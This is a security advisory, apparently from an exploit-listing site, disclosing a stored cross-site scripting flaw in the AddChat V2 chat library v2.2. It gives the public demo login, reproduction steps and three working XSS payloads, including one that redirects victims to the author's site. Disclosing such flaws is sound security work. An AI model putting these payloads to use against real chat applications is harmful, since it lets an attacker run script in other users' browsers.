AddChat V2 - Realtime Chat Library v2.2 Stored XSS Injection

2019.06.25
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/*! * ::- Title: AddChat V2 - Realtime Chat Library v2.2 Stored XSS Injection * ::- Author: m0ze * ::- Date: 2019/06/25 * ::- Software: AddChat V2 - Realtime Chat Library v2.2 */ ::- Details & Description -:: ~ Weak security measures like bad input field data filtering has been discovered in the «AddChat V2 - Realtime Chat Library». Current version of this web-application is 2.2. ::- Demo Website -:: ~ https://codecanyon.net/item/addchat-codeigniter-chat-plugin/20462938 ~ Frontend: https://addchat.classiebit.com/ ~ Backend: https://addchat.classiebit.com/user/login ~ Login & Password: johndoe / johndoe ::- Special Note -:: ~ - ::- Google Dork -:: ~ - ::- PoC Links -:: ~ - ::- PoC [Stored XSS Injection] -:: ~ Go to the demo website https://addchat.classiebit.com/user/login and log in with provided credentials (johndoe / johndoe), then open chat window by clicking on «Chat» icon on the bottom right corner. Select any user from the list and use your payload inside input field, then press «Send Message» button. ~ Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);> ~ Example #2: <img src=x onerror=window.location.replace('https://m0ze.ru/');> ~ Example #3: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">

References:

https://codecanyon.net/item/addchat-codeigniter-chat-plugin/20462938


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top